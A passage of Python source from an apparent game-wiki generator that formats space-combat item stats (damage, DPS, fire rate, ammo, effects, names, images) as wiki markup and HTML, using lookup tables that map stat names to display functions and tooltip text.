        subWeapon = GetItemSubWeapon(item)
        if subWeapon:
            effectName = SmallConstants.effectsData[subWeapon['effect']]['name']
        else:
            effectName = SmallConstants.effectsData[item['effect']]['name']
    except:
        pass
    totalDamage = GetItemTotalDamagePerVolley(item)
    rtnVal = GeneralUtils.NumDisplay(totalDamage, 2)
    effectDamage = GetItemEffectDamage(item)
    if GeneralUtils.floatCmp(effectDamage, '>', 0):
        message = "Includes {} damage from {}".format(GeneralUtils.NumDisplay(effectDamage, 1), effectName)
        if effectName == 'Radiation Damage':
            message += '.\nDamage is approximate depending on the mass of the target ship as well as whether the effect is refreshed. Estimation is for no refresh, ship mass of {}'.format(GeneralUtils.NumDisplay(Config.shipMassForDamageCalculation, 2))
        elif effectName == 'Corrosion':
            message += '.\nDamage is approximate depending on whether the effect is refreshed. Estimation is for no refresh'
        # Continuation of the caveat sentence; assumed to apply to every
        # effect type -- TODO confirm against rendered tables.
        if DisplayDamageAsPerHit(item):
            message += ' and assumes all hits land on the target.'
        elif GetNumOfDamagingProjectiles(item, True) > 1:
            message += ' and assumes all projectiles hit the target.'
        else:
            message += '.'
    if message:
        # Tooltip span shows the caveat on hover.
        rtnVal = '<span class="itemStatDetails" title="{}">{}</span>'.format(message, rtnVal)
    if includeIcons:
        if GeneralUtils.floatCmp(GetDamagePerRoundForItem(item), '>', 0):
            rtnVal = '{} {}'.format(rtnVal, GetDamageTypeIconForItem(item)).strip()
        if GeneralUtils.floatCmp(effectDamage, '>', 0):
            rtnVal = '{} {}'.format(rtnVal, GetEffectIconForItem(item)).strip()
    return rtnVal
def ItemDisplayStatRateOfFire(item, p=...):
    """Fire-rate text: 'N per sec' for fast weapons, '1 per N sec' for slow ones.

    Returns None when the item does not fire (fireRate <= 0).
    """
    try:
        # Turrets (augType 15) report their sub weapon's rate of fire.
        if item['augType'] == 15:
            subWeapon = GetItemSubWeapon(item)
            if subWeapon:
                return ItemDisplayStatRateOfFire(subWeapon, p)
    except:
        pass
    fireRate = item['fireRate']
    if fireRate > 0:
        if fireRate <= 1:
            return "{} per sec".format(GeneralUtils.NumDisplay(1 / fireRate, 1))
        return "1 per {} sec".format(GeneralUtils.NumDisplay(fireRate, 1))
def ItemDisplayStatRateOfFireShort(item, p=...):
    """Compact fire-rate text: '2/s' for fast weapons, '1/3s' for slow ones.

    Returns None when the item does not fire (fireRate <= 0).

    Fix vs. previous revision: the turret branch delegated to the
    long-format ItemDisplayStatRateOfFire (copy-paste error); it now
    recurses into the short format so turret rows stay compact.
    """
    try:
        # Turrets (augType 15) report their sub weapon's rate of fire.
        if item['augType'] == 15:
            subWeapon = GetItemSubWeapon(item)
            if subWeapon: return ItemDisplayStatRateOfFireShort(subWeapon, p)
    except:
        pass
    if item['fireRate'] > 0:
        fireRate = item['fireRate']
        if fireRate <= 1:
            return "{}/s".format(GeneralUtils.NumDisplay(1/fireRate, 1))
        return "1/{}s".format(GeneralUtils.NumDisplay(fireRate, 1))
def ItemDisplayStatDps(item, p=...):
    """Damage-per-second stat formatted for display."""
    dps = GetItemDps(item)
    return GeneralUtils.NumDisplay(dps, 1)
def ItemDisplayStatTotalDps(item, p=..., includeIcons=False):
    """Formatted DPS including effect (DoT) damage, with an explanatory
    tooltip and optional damage/effect icons.
    """
    rtnVal = None
    message = None
    totalDps = 0
    effectName = None
    try:
        # Turrets report their sub weapon's effect name.
        subWeapon = GetItemSubWeapon(item)
        if subWeapon:
            effectName = SmallConstants.effectsData[subWeapon['effect']]['name']
        else:
            effectName = SmallConstants.effectsData[item['effect']]['name']
    except:
        pass
    totalDps = GetItemDpsIncludingEffectDamage(item)
    rtnVal = GeneralUtils.NumDisplay(totalDps, 1)
    effectDps = GetItemEffectDamagePerSecond(item)
    if GeneralUtils.floatCmp(effectDps, '>', 0):
        message = "Includes {} dps from {}".format(GeneralUtils.NumDisplay(effectDps, 1), effectName)
        if effectName == 'Radiation Damage':
            message += '.\nDamage is approximate depending on the mass of the target ship. Estimation assumes a target ship mass of {}, with only this weapon applying the effect, firing as often as possible'.format(GeneralUtils.NumDisplay(Config.shipMassForDamageCalculation, 2))
        else:
            message += '.\nDamage is approximate and assumes only this weapon is applying the effect, firing as often as possible'
        # Continuation of the caveat sentence; assumed to apply to both
        # branches above -- TODO confirm against rendered tables.
        if GetNumOfDamagingProjectiles(item, True) > 1:
            message += ' and assumes all projectiles hit the target.'
        else:
            message += '.'
    if message:
        # Tooltip span shows the caveat on hover.
        rtnVal = '<span class="itemStatDetails" title="{}">{}</span>'.format(message, rtnVal)
    if includeIcons:
        if GeneralUtils.floatCmp(GetDamagePerRoundForItem(item), '>', 0):
            rtnVal = '{} {}'.format(rtnVal, GetDamageTypeIconForItem(item)).strip()
        if GeneralUtils.floatCmp(effectDps, '>', 0):
            rtnVal = '{} {}'.format(rtnVal, GetEffectIconForItem(item)).strip()
    return rtnVal
def ItemDisplayStatDpe(item, p=...):
    """Damage-per-energy stat formatted for display."""
    dpe = GetItemDpe(item)
    return GeneralUtils.NumDisplay(dpe, 2)
def ItemDisplayStatTotalDpe(item, p=...):
    """Formatted damage-per-energy including effect (DoT) damage, with a
    tooltip explaining the effect portion. Returns None when no DPE.
    """
    rtnVal = None
    totalDpe = GetItemDpeIncludingEffectDamage(item)
    if totalDpe:
        message = None
        effectName = None
        try:
            # Turrets report their sub weapon's effect name.
            subWeapon = GetItemSubWeapon(item)
            if subWeapon:
                effectName = SmallConstants.effectsData[subWeapon['effect']]['name']
            else:
                effectName = SmallConstants.effectsData[item['effect']]['name']
        except:
            pass
        rtnVal = GeneralUtils.NumDisplay(totalDpe, 2)
        effectDamage = GetItemEffectDamage(item)
        if effectDamage:
            message = "{} of this amount comes from {}".format(GeneralUtils.NumDisplay(effectDamage / item['ammoOrEnergyUsage'], 1), effectName)
            if effectName == 'Radiation Damage':
                message += '.\nDamage is approximate depending on the mass of the target ship as well as whether the effect is refreshed. Estimation is for no refresh, ship mass of {}'.format(GeneralUtils.NumDisplay(Config.shipMassForDamageCalculation, 2))
            elif effectName == 'Corrosion':
                message += '.\nDamage is approximate depending on whether the effect is refreshed. Estimation is for no refresh'
            # Continuation of the caveat sentence; assumed to apply to every
            # effect type -- TODO confirm against rendered tables.
            if GetNumOfDamagingProjectiles(item, True) > 1:
                message += ' and assumes all projectiles hit the target.'
            else:
                message += '.'
        if message:
            # Tooltip span shows the caveat on hover.
            rtnVal = '<span class="itemStatDetails" title="{}">{}</span>'.format(message, rtnVal)
    return rtnVal
def ItemDisplayStatEnergyRequired(item, p=...):
    """Energy cost display for an item; beam weapons show usage per second."""
    display = ""
    if 'energyUsage' in item and GeneralUtils.floatCmp(item['energyUsage'], '>', 0):
        display = GeneralUtils.NumDisplay(item['energyUsage'], 2)
    if not display and GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and item['energyBased']:
        display = GeneralUtils.NumDisplay(item['ammoOrEnergyUsage'], 2)
        if IsBeamWeapon(item):
            # Beams drain continuously; shown as raw value per second.
            display = "{}/s".format(item['ammoOrEnergyUsage'])
    return display
def ItemDisplayStatImage(item, p=...):
    """Wiki thumbnail markup for the item's image, or '' when none exists.

    Cleanup vs. previous revision: an unused 'title' computed from the
    item's base name was dead code and has been removed.
    """
    imageName = GetItemWikiImage(item)
    if imageName:
        return '[[File:{}|thumb|55x55px]]'.format(imageName)
    return ''
def ItemDisplayStatImageHtml(item, p=...):
    """HTML <img> tag for the item's icon ('' when no wiki image/URL); hides itself on load error."""
    if not GetItemWikiImage(item):
        return ''
    iconUrl = GetItemImageUrl(item)
    if not iconUrl:
        return ''
    return '<img src="{}" width="55" height="55" onError="this.onerror = \'\';this.style.visibility=\'hidden\';">'.format(iconUrl)
def ItemDisplayStatAmmo(item, p=...):
    """Ammo usage display; non-large weapons also show the 5x reserve in parentheses."""
    if GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and not item['energyBased']:
        usage = item['ammoOrEnergyUsage']
        if item['weaponType'] != 5:
            return "{} ({})".format(GeneralUtils.NumDisplay(usage, 0), GeneralUtils.NumDisplay(usage * 5, 0))
        return GeneralUtils.NumDisplay(usage, 0)
    return ""
def ItemDisplayStatAmmoReserve(item, p=...):
    """Total ammo reserve (five volleys) for ammo-based non-large weapons; '' otherwise."""
    if GeneralUtils.floatCmp(item['ammoOrEnergyUsage'], '>', 0) and not item['energyBased'] and item['weaponType'] != 5:
        return GeneralUtils.NumDisplay(item['ammoOrEnergyUsage'] * 5, 0)
    return ""
def ItemDisplayStatEffect(item, p=...):
    """Effect name (with duration) for display; chain lasers fall back to their description."""
    effectText = ""
    try:
        if item['effect'] >= 0:
            if item['type'] == 5:
                effectText = GetShieldEffectName(item, True)
            else:
                effectText = SmallConstants.effectsData[item['effect']]['name']
                if item['effectTime'] > 0:
                    effectText = "{} ({}s)".format(effectText, GeneralUtils.NumDisplay(item['effectTime'], 0))
    except:
        pass
    if effectText == "" and item['name'].lower().find('chain laser') >= 0:
        effectText = GetItemDescription(item)
    return effectText
def ItemDisplayStatEffectHtml(item, p=...):
    """Effect name (with duration) for HTML display; chain lasers fall back to their description with HTML links."""
    effectText = ""
    try:
        if item['effect'] >= 0:
            if item['type'] == 5:
                effectText = GetShieldEffectName(item, True)
            else:
                effectText = SmallConstants.effectsData[item['effect']]['name']
                if item['effectTime'] > 0:
                    effectText = "{} ({}s)".format(effectText, GeneralUtils.NumDisplay(item['effectTime'], 0))
    except:
        pass
    if effectText == "" and item['name'].lower().find('chain laser') >= 0:
        effectText = GetItemDescription(item, True)
    return effectText
def ItemDisplayStatSkill(item, p=...):
    """Abbreviated skill requirement, e.g. 'EX 3'; 'N/A' when none; '' when no skill."""
    requirement = item['skillRequirement']
    if requirement['skill'] < 0:
        return ""
    if requirement['level'] > 0:
        return "{} {}".format(
            ShortenSkillName(SmallConstants.skillsData[requirement['skill']]['name']),
            requirement['level']
        )
    return "N/A"
def ItemDisplayStatSkillFull(item, p=...):
    """Full (unshortened) skill requirement, e.g. "Engineering 5"; blank when none."""
    req = item['skillRequirement']
    if req['level'] <= 0:
        return ""
    return "{} {}".format(SmallConstants.skillsData[req['skill']]['name'], req['level'])
def ItemDisplayStatName(item, p=...):
    """Item name as a wiki link, optionally prefixed with a table-cell source class."""
    linkText = item['name']
    articlePage = GetItemWikiArticlePage(item)
    if articlePage:
        if WikiUtils.PageNamesEqual(articlePage, item['name']):
            linkText = '[[{}]]'.format(item['name'])
        else:
            linkText = '[[{}|{}]]'.format(articlePage, item['name'])
    sourceClass = GetItemSourceClassName(item)
    if not sourceClass:
        return linkText
    return ' class="{}" | {}'.format(sourceClass, linkText)
def ItemDisplayStatNameHtml(item, p=...):
    """Item name as an HTML link (escaped), optionally wrapped in a source-class span."""
    displayName = html.escape(item['name'])
    articlePage = GetItemWikiArticlePage(item)
    if articlePage:
        displayName = '<a href="{}">{}</a>'.format(WikiUtils.GetWikiLink(articlePage), displayName)
    sourceClass = GetItemSourceClassName(item)
    if not sourceClass:
        return displayName
    return '<span class="{}">{}</span>'.format(sourceClass, displayName)
def ItemDisplayStatNameAndImage(item, p=...):
    """Centered wiki table cell with the item's thumbnail (when available) above a link to it."""
    imageName = GetItemWikiImage(item)
    pageName = GetItemWikiArticlePage(item)
    if not pageName:
        pageName = SplitNameIntoBaseNameAndItemLevel(item['name'])['fullNameMinusLevel']
    itemName = item['name']
    sourceClass = GetItemSourceClassName(item)
    if sourceClass is None:
        sourceClass = ""
    # A plain [[Name]] link suffices when the article page matches the item name.
    linkTarget = '' if WikiUtils.PageNamesEqual(pageName, itemName) else '{}|'.format(pageName)
    cellPrefix = 'align="center" style="font-size: smaller;" class="{}" | '.format(sourceClass)
    if imageName:
        return cellPrefix + '[[File:{}|centre|thumb|60x60px|link={}]]<br/>[[{}{}]]'.format(imageName, pageName, linkTarget, itemName)
    return cellPrefix + '[[{}{}]]'.format(linkTarget, itemName)
def ItemDisplayStatNameAndImageHtml(item, p=...):
    """HTML equivalent of ItemDisplayStatNameAndImage: thumbnail + link in a centred div."""
    pageName = GetItemWikiArticlePage(item)
    if not pageName:
        pageName = SplitNameIntoBaseNameAndItemLevel(item['name'])['fullNameMinusLevel']
    wikiUrl = WikiUtils.GetWikiLink(pageName)
    imageName = GetItemWikiImage(item)
    itemName = item['name']
    sourceClass = GetItemSourceClassName(item)
    if sourceClass is None:
        sourceClass = ""
    if not imageName:
        return '<div style="text-align:center; font-size:smaller;" class="{}"><a href="{}">{}</a></div>'.format(sourceClass, wikiUrl, itemName)
    iconUrl = GetItemImageUrl(item)
    # Adjacent string literals keep the emitted HTML byte-identical to a single literal.
    template = ('<div style="text-align:center; font-size:smaller;" class="{}">'
                '<a href="{}"><img src="{}" width="60" height="60" '
                'onError="this.onerror = \'\';this.style.visibility=\'hidden\';"><br />{}</a></div>')
    return template.format(sourceClass, wikiUrl, iconUrl, itemName)
def ItemDisplayStatDamageType(item, p=...):
    """Direct-damage type name, or an empty string when the item deals none."""
    damageType = GetItemDamageType(item)
    if not damageType:
        return ''
    return damageType
def ItemDisplayStatEffectIcons(item, p=...):
    """Positive then negative shield-effect icons, separated by <br> when both parts exist."""
    positive = GetShieldEffectIconsForItem(item, "positive")
    negative = GetShieldEffectIconsForItem(item, "negative")
    if positive:
        return positive + "<br>" + negative
    return positive + negative
def ItemDisplayStatPurchaseCost(item, p=...):
    """Store price when the item is purchasable; otherwise "N/A" plus its source."""
    source = GetItemSource(item)
    if 'Purchase' in source:
        return GeneralUtils.NumDisplay(GetItemPurchasePrice(item), 0, True)
    return "N/A ({})".format(source)
def ItemDisplayStatBPLocation(item, p=...):
    """Blueprint location text with wiki links added (star links suppressed)."""
    location = GetItemBPLocation(item)
    return GeneralUtils.AddWikiLinksToText(location, False, False, { 'Stars': False })
def ItemDisplayStatBPLocationHtml(item, p=...):
    """Blueprint location text with HTML links added (star links suppressed)."""
    location = GetItemBPLocation(item)
    return GeneralUtils.AddHtmlLinksToText(location, True, False, { 'Stars': False })
def ItemDisplayStatSpeed(item, p=...):
    """Projectile speed display: "init → max" when they differ, else "<max>su/s"."""
    maxSpeed = GetItemMaxSpeed(item)
    initSpeed = GetItemInitialSpeed(item)
    if maxSpeed and initSpeed and maxSpeed != initSpeed:
        return "{} → {}".format(GeneralUtils.NumDisplay(initSpeed, 1), GeneralUtils.NumDisplay(maxSpeed, 1))
    if maxSpeed:
        return "{}su/s".format(GeneralUtils.NumDisplay(maxSpeed, 1))
    return ''
def ItemDisplayStatObtain(item, p=...):
    """How the item is obtained, as a wiki table cell with an optional source class."""
    source = GetItemSource(item)
    sourceClass = GetItemSourceClassName(item)
    if not sourceClass:
        return source
    return ' class="{}" | {}'.format(sourceClass, source)
def ItemDisplayStatObtainHtml(item, p=...):
    """How the item is obtained, as HTML with an optional source-class span."""
    source = GetItemSource(item)
    sourceClass = GetItemSourceClassName(item)
    if not sourceClass:
        return source
    return '<span class="{}">{}</span>'.format(sourceClass, source)
def ItemDisplayStatDestination(item, p=...):
    """Wiki link to the star system a (non-local) Micro Gate travels to."""
    lowerName = item['name'].lower()
    if 'micro gate' not in lowerName or 'local' in lowerName:
        return ""
    # The gate's system prefix is the final word of its name.
    prefix = item['name'].split(' ')[-1]
    systemName = GalaxyUtils.GetSystemNameByPrefix(prefix)
    wikiPageName = WikiUtils.GetWikiArticlePageForNameList([ systemName ])
    if not wikiPageName:
        return systemName
    if wikiPageName == systemName:
        return '[[{}]]'.format(systemName)
    return '[[{}|{}]]'.format(wikiPageName, systemName)
def ItemDisplayStatDestinationHtml(item, p=...):
    """HTML link to the star system a (non-local) Micro Gate travels to."""
    lowerName = item['name'].lower()
    if 'micro gate' not in lowerName or 'local' in lowerName:
        return ""
    # The gate's system prefix is the final word of its name.
    prefix = item['name'].split(' ')[-1]
    systemName = GalaxyUtils.GetSystemNameByPrefix(prefix)
    wikiPageName = WikiUtils.GetWikiArticlePageForNameList([ systemName ])
    if not wikiPageName:
        return systemName
    return '<a href="{}" title="{} Star System">{}</a>'.format(
        WikiUtils.GetWikiLink(wikiPageName),
        systemName,
        systemName
    )
def ItemDisplayStatItemType(item, p=...):
    """Item type as a wiki link; item pages expand some short type names."""
    itemType = GetItemType(item)
    displayItemType = itemType
    if p == "itemPage":
        # On item pages the short type names get fuller display text.
        if itemType == "Standard":
            displayItemType = "Standard Secondary Weapon"
        elif itemType in ("Proximity", "Large"):
            displayItemType = "{} Weapon".format(itemType)
    wikiPageName = GetWikiPageForItemType(itemType)
    if not wikiPageName:
        return itemType
    if wikiPageName == itemType:
        return '[[{}]]'.format(displayItemType)
    return '[[{}|{}]]'.format(wikiPageName, displayItemType)
def ItemDisplayStatItemTypeHtml(item, p=...):
    """Item type as an HTML link to its equipment page, or plain text when there is none."""
    itemType = GetItemType(item)
    wikiPageName = GetWikiPageForItemType(itemType)
    if not wikiPageName:
        return itemType
    return '<a href="{}" title="Equipment - {}">{}</a>'.format(
        WikiUtils.GetWikiLink(wikiPageName),
        itemType,
        itemType
    )
def ItemDisplayStatArmTime(item, p=...):
    """Arming delay in seconds; weaponType 5 items show their lifetime instead when set."""
    lifetime = GetItemLife(item)
    if item['weaponType'] == 5 and lifetime is not None and lifetime > 0:
        return "{}s".format(GeneralUtils.NumDisplay(lifetime, 2))
    if item['armingTime'] > 0:
        return "{}s".format(GeneralUtils.NumDisplay(item['armingTime'], 2))
    return ""
def ItemDisplayStatAcceleration(item, p=...):
    """Acceleration display: engines show a multiplier, everything else su/s/s.

    (Removed a dead local `rtnVal` that was assigned and never used.)
    """
    if GetItemType(item) == 'Engine':
        # Engines carry an acceleration *modifier* rather than an absolute value.
        return "x{}".format(GeneralUtils.NumDisplay(item['accelMod'], 4)) if item['accelMod'] > 0 else ""
    return "{}su/s/s".format(GeneralUtils.NumDisplay(item['acceleration'], 2))
### Generic stat display
def ItemDisplayStatGeneric(item, p=...):
    """Fallback display: return the raw item property named by ``p``, or "" if absent.

    Narrowed the former bare ``except:`` to the lookup errors a subscript can
    actually raise, so Ctrl-C/SystemExit are no longer swallowed.
    """
    try:
        return item[p]
    except (KeyError, IndexError, TypeError):
        # Unknown stat name: report it so missing switcher entries are noticed.
        print("{} not found".format(p))
        return ""
# Maps a lower-cased stat/column name to its display function. Each value is
# called as func(item, propName) and returns the wiki-markup cell text.
# Fixes applied: (1) 'lifetime' had its precision argument misplaced outside
# the NumDisplay call (it was a silently-ignored second argument to
# str.format); (2) 'trn' was defined twice - the later (1-decimal) entry won,
# so it is the one kept.
itemDisplayStatSwitcher = {
    'acceleration': ItemDisplayStatAcceleration,
    'accel': ItemDisplayStatAcceleration,
    'ac': (lambda obj, p: GeneralUtils.NumDisplay(obj['accuracy'], 2)),
    'acc': (lambda obj, p: GeneralUtils.NumDisplay(obj['accuracy'], 2)),
    'accuracy': (lambda obj, p: GeneralUtils.NumDisplay(obj['accuracy'], 2)),
    'acquisition': ItemDisplayStatObtain,
    'am': ItemDisplayStatAmmo,
    'ammo cost': (lambda obj, p: GeneralUtils.NumDisplay(GetItemAmmoCost(obj), 0, True) if GetItemAmmoCost(obj) > 0 else ""),
    'ammo': ItemDisplayStatAmmo,
    'amount': (lambda obj, p: obj['amount'] if obj['amount'] > 0 else ""),
    'amt': (lambda obj, p: GetNumOfDamagingProjectiles(obj, True)),
    'ar': ItemDisplayStatAmmoReserve,
    'arming time': ItemDisplayStatArmTime,
    'arm': ItemDisplayStatArmTime,
    'aug type': (lambda obj, p: GetItemAugType(obj)),
    'autopilot': (lambda obj, p: "+{}".format(GeneralUtils.NumDisplay(obj['autoPilotSpeedInc'], 4)) if obj['autoPilotSpeedInc'] > 0 else ""),
    'base dpe': ItemDisplayStatDpe,
    'base dps': ItemDisplayStatDps,
    'bdpe': ItemDisplayStatDpe,
    'bdps': ItemDisplayStatDps,
    'bp location': ItemDisplayStatBPLocation,
    'charge delay': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(obj['chargeDelay'], 4)) if obj['chargeDelay'] > 0 else ""),
    'charge rate': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['chargeModifier'], 4)) if obj['chargeModifier'] > 0 else ""),
    'cost': ItemDisplayStatPurchaseCost,
    'damage': ItemDisplayStatDamage,
    'destination': ItemDisplayStatDestination,
    'dmg': ItemDisplayStatDamage,
    'dmg type': ItemDisplayStatDamageType,
    'dpe': ItemDisplayStatTotalDpe,
    'dph': ItemDisplayStatDamage,
    'dps': ItemDisplayStatTotalDps,
    'effect': ItemDisplayStatEffect,
    'effect icons': ItemDisplayStatEffectIcons,
    'effects': ItemDisplayStatEffect,
    'energy': ItemDisplayStatEnergyRequired,
    'energy usage': ItemDisplayStatEnergyRequired,
    'engine name': ItemDisplayStatName,
    'et': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(obj['effectTime'], 0)) if obj['effectTime'] > 0 else ""),
    'eu': ItemDisplayStatEnergyRequired,
    'fire rate': ItemDisplayStatRateOfFire,
    'image': ItemDisplayStatImage,
    'img': ItemDisplayStatImage,
    'init spd': (lambda obj, p: GeneralUtils.NumDisplay(GetItemInitialSpeed(obj), 1) if GetItemInitialSpeed(obj) else ""),
    'init speed': (lambda obj, p: GeneralUtils.NumDisplay(GetItemInitialSpeed(obj), 1) if GetItemInitialSpeed(obj) else ""),
    'is': (lambda obj, p: GeneralUtils.NumDisplay(GetItemInitialSpeed(obj), 1) if GetItemInitialSpeed(obj) else ""),
    'item': ItemDisplayStatNameAndImage,
    'is passive': (lambda obj, p: 'Yes' if 'passive' in obj and obj['passive'] else 'No'),
    # Fixed: precision 1 now passed to NumDisplay instead of str.format.
    'lifetime': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(GetItemLife(obj), 1)) if GetItemLife(obj) else ""),
    'lifetime (s)': (lambda obj, p: GeneralUtils.NumDisplay(GetItemLife(obj), 1) if GetItemLife(obj) > 0 else ""),
    'lrng': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemRange(obj), 1)) if obj['guidance'] == 1 or IsBeamWeapon(obj) or 'Smart' in obj['name'] else ''),
    'lt': (lambda obj, p: "{}s".format(GeneralUtils.NumDisplay(GetItemLife(obj), 1)) if GetItemLife(obj) > 0 else ""),
    'max spd': (lambda obj, p: GeneralUtils.NumDisplay(GetItemMaxSpeed(obj), 1) if GetItemMaxSpeed(obj) else ""),
    'max speed': (lambda obj, p: GeneralUtils.NumDisplay(GetItemMaxSpeed(obj), 1) if GetItemMaxSpeed(obj) else ""),
    'maximum charge multiplier': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['maxModifier'], 4)) if obj['maxModifier'] > 0 else ""),
    'maximum charge mult': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['maxModifier'], 4)) if obj['maxModifier'] > 0 else ""),
    'min rng': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemMinRange(obj), 1)) if GetItemMinRange(obj) else ''),
    'mrng': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemMinRange(obj), 1)) if GetItemMinRange(obj) else ''),
    'ms': (lambda obj, p: GeneralUtils.NumDisplay(GetItemMaxSpeed(obj), 1) if GetItemMaxSpeed(obj) else ""),
    'name': ItemDisplayStatName,
    'notes': (lambda obj, p: GetItemDescription(obj)),
    'obtained': ItemDisplayStatObtain,
    'obtaining': ItemDisplayStatObtain,
    'obtain': ItemDisplayStatObtain,
    'pd': (lambda obj, p: "{} sec".format(GeneralUtils.NumDisplay(obj['propulsionEnhanceTime'], 4)) if obj['propulsionEnhanceTime'] > 0 else ""),
    'price unmodified': (lambda obj, p: GeneralUtils.NumDisplay(obj['price'], 0, True)),
    'prop': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['propulsionEnhance'], 4)) if obj['propulsionEnhance'] > 0 else ""),
    'prop time': (lambda obj, p: "{} sec".format(GeneralUtils.NumDisplay(obj['propulsionEnhanceTime'], 4)) if obj['propulsionEnhanceTime'] > 0 else ""),
    'propulsion': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['propulsionEnhance'], 4)) if obj['propulsionEnhance'] > 0 else ""),
    'purchase cost': ItemDisplayStatPurchaseCost,
    'race': (lambda obj, p: GetRaceForItem(obj)),
    'range': (lambda obj, p: "{}su".format(GeneralUtils.NumDisplay(GetItemRange(obj), 1)) if GetItemRange(obj) else ''),
    'rebuy cost': (lambda obj, p: GeneralUtils.NumDisplay(GetItemAmmoCost(obj), 0, True) if GetItemAmmoCost(obj) > 0 else ""),
    'required_skill': ItemDisplayStatSkillFull,
    'reverse': (lambda obj, p: "{}%".format(GeneralUtils.NumDisplay(obj['reverseSpeedMod'] * 100, 1)) if obj['reverseSpeedMod'] > 0 else ""),
    'rng': (lambda obj, p: GeneralUtils.NumDisplay(GetItemRange(obj), 1) if GetItemRange(obj) else ''),
    'rate of fire': ItemDisplayStatRateOfFire,
    'rof': ItemDisplayStatRateOfFireShort,
    'secondary effects': (lambda obj, p: GetItemDescription(obj)),
    'sk': ItemDisplayStatSkill,
    'skill': ItemDisplayStatSkill,
    'spd': ItemDisplayStatSpeed,
    'speed': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['maxSpeedMod'], 4)) if obj['maxSpeedMod'] > 0 else ""),
    'td': ItemDisplayStatTotalDamagePerVolley,
    'tdpe': ItemDisplayStatTotalDpe,
    'tdpv': ItemDisplayStatTotalDamagePerVolley,
    'tdps': ItemDisplayStatTotalDps,
    'total dmg': ItemDisplayStatTotalDamagePerVolley,
    'total ammo': ItemDisplayStatAmmo,
    'turning': (lambda obj, p: "x{}".format(GeneralUtils.NumDisplay(obj['turningMod'], 4)) if obj['turningMod'] > 0 else ""),
    'trn': (lambda obj, p: "{}°".format(GeneralUtils.NumDisplay(obj['turning'] * Config.turnMultiplier, 1)) if obj['turning'] > 0 else ""),
    'turn': (lambda obj, p: "{}°".format(GeneralUtils.NumDisplay(obj['turning'] * Config.turnMultiplier, 2)) if obj['turning'] > 0 else ""),
    'type': ItemDisplayStatItemType,
    'velocity': ItemDisplayStatSpeed,
    'volley': (lambda obj, p: obj['amount'] if obj['amount'] > 0 else ""),
    'weapon_type': ItemDisplayStatItemType,
}
# The HTML switcher reuses the wiki-markup display functions, overriding only
# the entries whose rendering differs in HTML.
itemDisplayStatSwitcherHtml = itemDisplayStatSwitcher.copy()
itemDisplayStatSwitcherHtml.update({
    'engine name': ItemDisplayStatNameHtml,
    'name': ItemDisplayStatNameHtml,
    'img': ItemDisplayStatImageHtml,
    'image': ItemDisplayStatImageHtml,
    'obtain': ItemDisplayStatObtainHtml,
    'obtaining': ItemDisplayStatObtainHtml,
    'obtained': ItemDisplayStatObtainHtml,
    'acquisition': ItemDisplayStatObtainHtml,
    'destination': ItemDisplayStatDestinationHtml,
    'type': ItemDisplayStatItemTypeHtml,
    'item': ItemDisplayStatNameAndImageHtml,
    'effect': ItemDisplayStatEffectHtml,
    'effects': ItemDisplayStatEffectHtml,
    'bp location': ItemDisplayStatBPLocationHtml,
    'notes': (lambda obj, p: GetItemDescription(obj, useHtmlForLinks=True)),
    'secondary effects': (lambda obj, p: GetItemDescription(obj, useHtmlForLinks=True)),
})
def GetStatDisplayForObject(propName, obj):
    """Wiki-markup display value for the given stat of an item.

    Unknown stat names fall through to ItemDisplayStatGeneric; any error in
    the underlying display function degrades to "" so a single bad item
    cannot abort a page build.
    """
    try:
        func = itemDisplayStatSwitcher.get(propName.lower(), ItemDisplayStatGeneric)
        return func(obj, propName)
    except Exception:
        # Was a bare except; narrowed so Ctrl-C/SystemExit still propagate.
        return ""
def GetHtmlStatDisplayForObject(propName, obj):
    """HTML display value for the given stat of an item; errors degrade to ""."""
    try:
        func = itemDisplayStatSwitcherHtml.get(propName.lower(), ItemDisplayStatGeneric)
        return func(obj, propName)
    except Exception:
        # Was a bare except; narrowed so Ctrl-C/SystemExit still propagate.
        return ""
# Get relevant stat descriptions
# Maps a lower-cased stat name to a callable(statName, pageType) returning the
# tooltip text for that stat. Commented-out keys intentionally have no
# description. Fix applied: 'trn' was defined twice with identical text - the
# duplicate has been removed.
itemStatDescriptionSwitcher = {
    'acceleration': (lambda s, pt: "Engine acceleration modifier. The higher acceleration a ship has the quicker it gets up to max speed (100 accel = 1 second to max)"),
    'accel': (lambda s, pt: "Engine acceleration modifier. The higher acceleration a ship has the quicker it gets up to max speed (100 accel = 1 second to max)"),
    'ac': (lambda s, pt: "Accuracy or spread measured in degrees"),
    'acc': (lambda s, pt: "Accuracy or spread measured in degrees"),
    'accuracy': (lambda s, pt: "Accuracy or spread measured in degrees"),
    'acquisition': (lambda s, pt: "How you can obtain the item"),
    'am': (lambda s, pt: "Ammo per clip (Reserve ammo)"),
    'ammo cost': (lambda s, pt: "Ammo cost per magazine"),
    'ammo': (lambda s, pt: "Ammo per clip (Reserve ammo)"),
    'amount': (lambda s, pt: "Number of projectiles fired per volley"),
    'amt': (lambda s, pt: "Number of projectiles fired per volley"),
    'ar': (lambda s, pt: "Reserve Ammo"),
    'arming time': (lambda s, pt: "The delay in seconds before the item activates and is able to hit a target"),
    'arm': (lambda s, pt: "The delay in seconds before the item activates and is able to hit a target"),
    'aug type': (lambda s, pt: "The type of augmentation"),
    'autopilot': (lambda s, pt: "Additional speed applied when using auto-pilot. Typically this is a flat rate added to max speed measured in su/s"),
    'base dpe': (lambda s, pt: "Damage per energy spent only counting the base weapon damage (no effect damage)"),
    'base dps': (lambda s, pt: "Damage per second only counting the base weapon damage (no effect damage)"),
    'bdpe': (lambda s, pt: "Damage per energy spent only counting the base weapon damage (no effect damage)"),
    'bdps': (lambda s, pt: "Damage per second only counting the base weapon damage (no effect damage)"),
